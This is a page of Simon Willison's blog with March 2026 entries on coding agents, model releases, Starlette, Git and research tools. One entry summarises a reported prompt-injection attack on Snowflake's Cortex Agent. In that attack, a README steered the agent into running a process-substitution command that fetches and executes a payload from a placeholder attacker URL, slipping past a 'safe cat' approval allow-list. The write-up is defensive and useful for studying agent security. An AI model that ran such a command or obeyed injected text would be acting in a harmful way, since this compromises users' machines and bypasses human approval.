Simon Willison’s Weblog

On codex-cli 29 coding-agents 182 claude 263 llm-release 185 llms 1673 ...

 

Entries Links Quotes Notes Guides Elsewhere

March 23, 2026

I have been doing this for years, and the hardest parts of the job were never about typing out code. I have always struggled most with understanding systems, debugging things that made no sense, designing architectures that wouldn't collapse under heavy load, and making decisions that would save months of pain later.

None of these problems can be solved LLMs. They can suggest code, help with boilerplate, sometimes can act as a sounding board. But they don't understand the system, they don't carry context in their "minds", and they certianly don't know why a decision is right or wrong.

And the most importantly, they don't choose. That part is still yours. The real work of software development, the part that makes someone valuable, is knowing what should exist in the first place, and why.

David Abram, The machine didn't take your craft. You gave it up.

# 6:56 pm / careers, ai-assisted-programming, generative-ai, ai, llms

Last month I added a feature I call beats to this blog, pulling in some of my other content from external sources and including it on the homepage, search and various archive pages on the site.

On any given day these frequently outnumber my regular posts. They were looking a little bit thin and were lacking any form of explanation beyond a link, so I've added the ability to annotate them with a "note" which now shows up as part of their display.

Here's what that looks like for the content I published yesterday:

Screenshot of part of my blog homepage showing four "beats" entries from March 22, 2026, each tagged as RESEARCH or TOOL, with titles like "PCGamer Article Performance Audit" and "DNS Lookup", now annotated with short descriptive notes explaining the context behind each linked item.

I've also updated the /atom/everything/ Atom feed to include any beats that I've attached notes to.

# 2:13 am / atom, blogging, site-upgrades

Research Starlette 1.0 skill — Starlette 1.0 Skill offers a concise guide for building robust web applications with Starlette, a lightweight ASGI framework. The accompanying demo showcases a task management app featuring projects, tasks, comments, and labels, illustrating Starlette's flexibility in handling routing, templating (Jinja2), async database operations (aiosqlite), and real-time updates.

March 22, 2026

Experimenting with Starlette 1.0 with Claude skills

Visit Experimenting with Starlette 1.0 with Claude skills

Starlette 1.0 is out! This is a really big deal. I think Starlette may be the Python framework with the most usage compared to its relatively low brand recognition because Starlette is the foundation of FastAPI, which has attracted a huge amount of buzz that seems to have overshadowed Starlette itself.

[... 1,194 words]

Research PCGamer Article Performance Audit — A performance audit of the March 2026 PCGamer article on RSS readers reveals severe page bloat, with over 82% of network traffic and transferred bytes traced to ad-tech, tracking, and programmatic advertising scripts. Despite the core content consisting of just 10-15 KB of text and a handful of images (~150 KB total), the page triggers over 431 network requests and 5.5 MB of transfer (18.8 MB decoded) within 60 seconds—ballooning to 200+ MB in Firefox due to autoplay video carousels and…

Stuart Breckenridge pointed out that PC Gamer Recommends RSS Readers in a 37MB Article That Just Keeps Downloading, highlighting a truly horrifying example of web bloat that added up to 100s more MBs thanks to auto-playing video ads. I decided to have Claude Code for web use Rodney to investigate the page - prompt here.

Research JavaScript Sandboxing Research — Analyzing current JavaScript sandboxing options for running untrusted code, this research compares core approaches in Node.js (including worker_threads, node:vm, and the Permission Model), prominent npm packages (isolated-vm, vm2), and alternative engines like quickjs-emscripten.

Aaron Harper wrote about Node.js worker threads, which inspired me to run a research task to see if they might help with running JavaScript in a sandbox. Claude Code went way beyond my initial question and produced a comparison of isolated-vm, vm2, quickjs-emscripten, QuickJS-NG, ShadowRealm, and Deno Workers.

Tool DNS Lookup

TIL that Cloudflare's 1.1.1.1 DNS service (and 1.1.1.2 and 1.1.1.3, which block malware and malware + adult content respectively) has a CORS-enabled JSON API, so I had Claude Code build me a UI for running DNS queries against all three of those resolvers.

Tool Merge State Visualizer — # CRDT Merge State Visualizer

Bram Cohen wrote about his coherent vision for the future of version control using CRDTs, illustrated by 470 lines of Python.

I fed that Python (minus comments) into Claude and asked for an explanation, then had it use Pyodide to build me an interactive UI for seeing how the algorithms work.

March 21, 2026

Profiling Hacker News users based on their comments

Here’s a mildly dystopian prompt I’ve been experimenting with recently: “Profile this user”, accompanied by a copy of their last 1,000 comments on Hacker News.

[... 976 words]

Agentic Engineering Patterns >

Using Git with coding agents

Git is a key tool for working with coding agents. Keeping code in version control lets us record how that code changes over time and investigate and reverse any mistakes. All of the coding agents are fluent in using Git's features, both basic and advanced.

This fluency means we can be more ambitious about how we use Git ourselves. We don't need to memorize how to do things with Git, but staying aware of what's possible means we can take advantage of the full suite of Git's abilities.

Git essentials

Each Git project lives in a repository - a folder on disk that can track changes made to the files within it. Those changes are recorded in commits - timestamped bundles of changes to one or more files accompanied by a commit message describing those changes and an author recording who made them. [... 1,396 words]

# 10:08 pm / coding-agents, generative-ai, github, agentic-engineering, ai, git, llms

March 20, 2026

Turbo Pascal 3.02A, deconstructed. In Things That Turbo Pascal is Smaller Than James Hague lists things (from 2011) that are larger in size than Borland's 1985 Turbo Pascal 3.02 executable - a 39,731 byte file that somehow included a full text editor IDE and Pascal compiler.

This inspired me to track down a copy of that executable (available as freeware since 2000) and see if Claude could interpret the binary and decompile it for me.

It did a great job, so I had it create this interactive artifact illustrating the result. Here's the sequence of prompts I used (in regular claude.ai chat, not Claude Code):

Read this https://prog21.dadgum.com/116.html

Now find a copy of that binary online

Explore this (I attached the zip file)

Build an artifact - no react - that embeds the full turbo.com binary and displays it in a way that helps understand it - broke into labeled segments for different parts of the application, decompiled to visible source code (I guess assembly?) and with that assembly then reconstructed into readable code with extensive annotations

Infographic titled "TURBO.COM" with subtitle "Borland Turbo Pascal 3.02A — September 17, 1986 — Deconstructed" on a dark background. Four statistics are displayed: 39,731 TOTAL BYTES, 17 SEGMENTS MAPPED, 1 INT 21H INSTRUCTION, 100+ BUILT-IN IDENTIFIERS. Below is a "BINARY MEMORY MAP — 0X0100 TO 0X9C33" shown as a horizontal color-coded bar chart with a legend listing 17 segments: COM Header & Copyright, Display Configuration Table, Screen I/O & Video BIOS Routines, Keyboard Input Handler, String Output & Number Formatting, DOS System Call Dispatcher, Runtime Library Core, Error Handler & Runtime Errors, File I/O System, Software Floating-Point Engine, x86 Code Generator, Startup Banner & Main Menu Loop, File Manager & Directory Browser, Compiler Driver & Status, Full-Screen Text Editor, Pascal Parser & Lexer, and Symbol Table & Built-in Identifiers.

Update: Annoyingly the Claude share link doesn't show the actual code that Claude executed, but here's the zip file it gave me when I asked to download all of the intermediate files.

I ran Codex CLI with GPT-5.4 xhigh against that zip file to see if it would spot any obvious hallucinations, and it did not. This project is low-enough stakes that this gave me enough confidence to publish the result!

# 11:59 pm / computer-history, tools, ai, generative-ai, llms, claude

Tool TURBO.COM — 39,731 Bytes Deconstructed — # Turbo Pascal 3.02A Binary Deconstruction

Congrats to the @cursor_ai team on the launch of Composer 2!

We are proud to see Kimi-k2.5 provide the foundation. Seeing our model integrated effectively through Cursor's continued pretraining & high-compute RL training is the open model ecosystem we love to support.

Note: Cursor accesses Kimi-k2.5 via @FireworksAI_HQ hosted RL and inference platform as part of an authorized commercial partnership.

Kimi.ai @Kimi_Moonshot, responding to reports that Composer 2 was built on top of Kimi K2.5

# 8:29 pm / kimi, generative-ai, ai, cursor, llms, ai-in-china

Research SQLite Tags Benchmark: Comparing 5 Tagging Strategies — Benchmarking five tagging strategies in SQLite reveals clear trade-offs between query speed, storage, and implementation complexity for workflows involving tags (100,000 rows, 100 tags, average 6.5 tags/row). Indexed approaches—materialized lookup tables on JSON and classic many-to-many tables—easily outperform others, handling single-tag queries in under 1.5 milliseconds, while raw JSON and LIKE-based solutions are much slower.

I had Claude Code run a micro-benchmark comparing different approaches to implementing tagging in SQLite. Traditional many-to-many tables won, but FTS5 came a close second. Full table scans with LIKE queries performed better than I expected, but full table scans with JSON arrays and json_each() were much slower.

March 19, 2026

Research PDF to Image Converter — Leveraging Rust's `pdfium-render` crate and Python's PyO3 bindings, this project enables fast and reliable conversion of PDF pages to JPEG images, packaged as a self-contained Python wheel. The CLI tool and Python library are both built to require no external dependencies, bundling the necessary PDFium binary for ease of installation and cross-platform compatibility.

Thoughts on OpenAI acquiring Astral and uv/ruff/ty

The big news this morning: Astral to join OpenAI (on the Astral blog) and OpenAI to acquire Astral (the OpenAI announcement). Astral are the company behind uv, ruff, and ty—three increasingly load-bearing open source projects in the Python ecosystem. I have thoughts!

[... 1,378 words]

Research REXC (rx) JSON Test Suite — REXC (rx) JSON Test Suite provides a comprehensive, language-agnostic test resource for validating implementations of the REXC encoder/decoder. It includes a single JSON file with 206 tests covering base64 encoding, zigzag integer transformations, value conversions, roundtrip integrity, and special numeric values, ensuring correctness across platforms.

March 18, 2026

Autoresearching Apple’s “LLM in a Flash” to run Qwen 397B locally. Here's a fascinating piece of research by Dan Woods, who managed to get a custom version of Qwen3.5-397B-A17B running at 5.5+ tokens/second on a 48GB MacBook Pro M3 Max despite that model taking up 209GB (120GB quantized) on disk.

Qwen3.5-397B-A17B is a Mixture-of-Experts (MoE) model, which means that each token only needs to run against a subset of the overall model weights. These expert weights can be streamed into memory from SSD, saving them from all needing to be held in RAM at the same time.

Dan used techniques described in Apple's 2023 paper LLM in a flash: Efficient Large Language Model Inference with Limited Memory:

This paper tackles the challenge of efficiently running LLMs that exceed the available DRAM capacity by storing the model parameters in flash memory, but bringing them on demand to DRAM. Our method involves constructing an inference cost model that takes into account the characteristics of flash memory, guiding us to optimize in two critical areas: reducing the volume of data transferred from flash and reading data in larger, more contiguous chunks.

He fed the paper to Claude Code and used a variant of Andrej Karpathy's autoresearch pattern to have Claude run 90 experiments and produce MLX Objective-C and Metal code that ran the model as efficiently as possible.

danveloper/flash-moe has the resulting code plus a PDF paper mostly written by Claude Opus 4.6 describing the experiment in full.

The final model has the experts quantized to 2-bit, but the non-expert parts of the model such as the embedding table and routing matrices are kept at their original precision, adding up to 5.5GB which stays resident in memory while the model is running.

Qwen 3.5 usually runs 10 experts per token, but this setup dropped that to 4 while claiming that the biggest quality drop-off occurred at 3.

It's not clear to me how much the quality of the model results are affected. Claude claimed that "Output quality at 2-bit is indistinguishable from 4-bit for these evaluations", but the description of the evaluations it ran is quite thin.

Update: Dan's latest version upgrades to 4-bit quantization of the experts (209GB on disk, 4.36 tokens/second) after finding that the 2-bit version broke tool calling while 4-bit handles that well.

# 11:56 pm / ai, generative-ai, local-llms, llms, qwen, mlx

Release datasette 1.0a26 — An open source multi-tool for exploring and publishing data

Datasette now has a mechanism for assigning semantic column types. Built-in column types include urlemail, and json, and plugins can register additional types using the new register_column_types() plugin hook.

Snowflake Cortex AI Escapes Sandbox and Executes Malware (via) PromptArmor report on a prompt injection attack chain in Snowflake's Cortex Agent, now fixed.

The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README.

The attack caused the agent to execute this code:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Cortex listed cat commands as safe to run without human approval, without protecting against this form of process substitution that can occur in the body of the command.

I've seen allow-lists against command patterns like this in a bunch of different agent tools and I don't trust them at all - they feel inherently unreliable to me.

I'd rather treat agent commands as if they could do anything that process itself is allowed to do, hence my interest in deterministic sandboxes that operate outside of the layer of the agent itself.

# 5:43 pm / sandboxing, security, ai, prompt-injection, generative-ai, llms

March 17, 2026

Great news—we’ve hit our (very modest) performance goals for the CPython JIT over a year early for macOS AArch64, and a few months early for x86_64 Linux. The 3.15 alpha JIT is about 11-12% faster on macOS AArch64 than the tail calling interpreter, and 5-6%faster than the standard interpreter on x86_64 Linux.

Ken Jin, Python 3.15’s JIT is now back on track

# 9:48 pm / python

GPT-5.4 mini and GPT-5.4 nano, which can describe 76,000 photos for $52

Visit GPT-5.4 mini and GPT-5.4 nano, which can describe 76,000 photos for $52

OpenAI today: Introducing GPT‑5.4 mini and nano. These models join GPT-5.4 which was released two weeks ago.

[... 717 words]

Release llm 0.29 — Access large language models from the command-line

Adds support for OpenAI's new models gpt-5.4, gpt-5.4-mini, and gpt-5.4-nano.

Research syntaqlite Python Extension — syntaqlite-python-extension is a Python C extension module that integrates the syntaqlite Rust/C SQL toolkit, making high-fidelity SQL parsing, formatting, validation, and tokenization available to Python and Pyodide environments. It wraps syntaqlite's native FFI for both desktop and web, linking against static libraries produced by Rust and employing Emscripten for WASM builds.

If you do not understand the ticket, if you do not understand the solution, or if you do not understand the feedback on your PR, then your use of LLM is hurting Django as a whole. [...]

For a reviewer, it’s demoralizing to communicate with a facade of a human.

This is because contributing to open source, especially Django, is a communal endeavor. Removing your humanity from that experience makes that endeavor more difficult. If you use an LLM to contribute to Django, it needs to be as a complementary tool, not as your vehicle.

Tim Schilling, Give Django your time and money, not your tokens

# 4:13 pm / ai-ethics, open-source, generative-ai, ai, django, llms

Agentic Engineering Patterns >

Subagents

LLMs are restricted by their context limit - how many tokens they can fit in their working memory at any given time. These values have not increased much over the past two years even as the LLMs themselves have seen dramatic improvements in their abilities - they generally top out at around 1,000,000, and benchmarks frequently report better quality results below 200,000.

Carefully managing the context such that it fits within those limits is critical to getting great results out of a model.

Subagents provide a simple but effective way to handle larger tasks without burning through too much of the coding agent’s valuable top-level context. [... 926 words]

# 12:32 pm / parallel-agents, coding-agents, generative-ai, agentic-engineering, ai, llms

March 16, 2026

Introducing Mistral Small 4. Big new release from Mistral today (despite the name) - a new Apache 2 licensed 119B parameter (Mixture-of-Experts, 6B active) model which they describe like this:

Mistral Small 4 is the first Mistral model to unify the capabilities of our flagship models, Magistral for reasoning, Pixtral for multimodal, and Devstral for agentic coding, into a single, versatile model.

It supports reasoning_effort="none" or reasoning_effort="high", with the latter providing "equivalent verbosity to previous Magistral models".

The new model is 242GB on Hugging Face.

I tried it out via the Mistral API using llm-mistral:

llm install llm-mistral
llm mistral refresh
llm -m mistral/mistral-small-2603 "Generate an SVG of a pelican riding a bicycle"

The bicycle is upside down and mangled and the pelican is a series of grey curves with a triangular beak.

I couldn't find a way to set the reasoning effort in their API documentation, so hopefully that's a feature which will land soon.

Update 23rd March: Here's new documentation for the reasoning_effort parameter.

Also from Mistral today and fitting their -stral naming convention is Leanstral, an open weight model that is specifically tuned to help output the Lean 4 formally verifiable coding language. I haven't explored Lean at all so I have no way to credibly evaluate this, but it's interesting to see them target one specific language in this way.

# 11:41 pm / ai, generative-ai, llms, llm, mistral, pelican-riding-a-bicycle, llm-reasoning, llm-release

Use subagents and custom agents in Codex (via) Subagents were announced in general availability today for OpenAI Codex, after several weeks of preview behind a feature flag.

They're very similar to the Claude Code implementation, with default subagents for "explorer", "worker" and "default". It's unclear to me what the difference between "worker" and "default" is but based on their CSV example I think "worker" is intended for running large numbers of small tasks in parallel.

Codex also lets you define custom agents as TOML files in ~/.codex/agents/. These can have custom instructions and be assigned to use specific models - including gpt-5.3-codex-spark if you want some raw speed. They can then be referenced by name, as demonstrated by this example prompt from the documentation:

Investigate why the settings modal fails to save. Have browser_debugger reproduce it, code_mapper trace the responsible code path, and ui_fixer implement the smallest fix once the failure mode is clear.

The subagents pattern is widely supported in coding agents now. Here's documentation across a number of different platforms:

Update: I added a chapter on Subagents to my Agentic Engineering Patterns guide.

# 11:03 pm / ai, openai, generative-ai, llms, coding-agents, codex-cli, parallel-agents, agentic-engineering

The point of the blackmail exercise was to have something to describe to policymakers—results that are visceral enough to land with people, and make misalignment risk actually salient in practice for people who had never thought about it before.

A member of Anthropic’s alignment-science team, as told to Gideon Lewis-Kraus

# 9:38 pm / ai-ethics, anthropic, claude, generative-ai, ai, llms

Tidbit: the software-based camera indicator light in the MacBook Neo runs in the secure exclave¹ part of the chip, so it is almost as secure as the hardware indicator light. What that means in practice is that even a kernel-level exploit would not be able to turn on the camera without the light appearing on screen. It runs in a privileged environment separate from the kernel and blits the light directly onto the screen hardware.

Guilherme Rambo, in a text message to John Gruber

# 8:34 pm / hardware, apple, privacy, john-gruber

Highlights

Monthly briefing

Sponsor me for $10/month and get a curated email digest of the month's most important LLM developments.

Pay me to send you less!

Sponsor & subscribe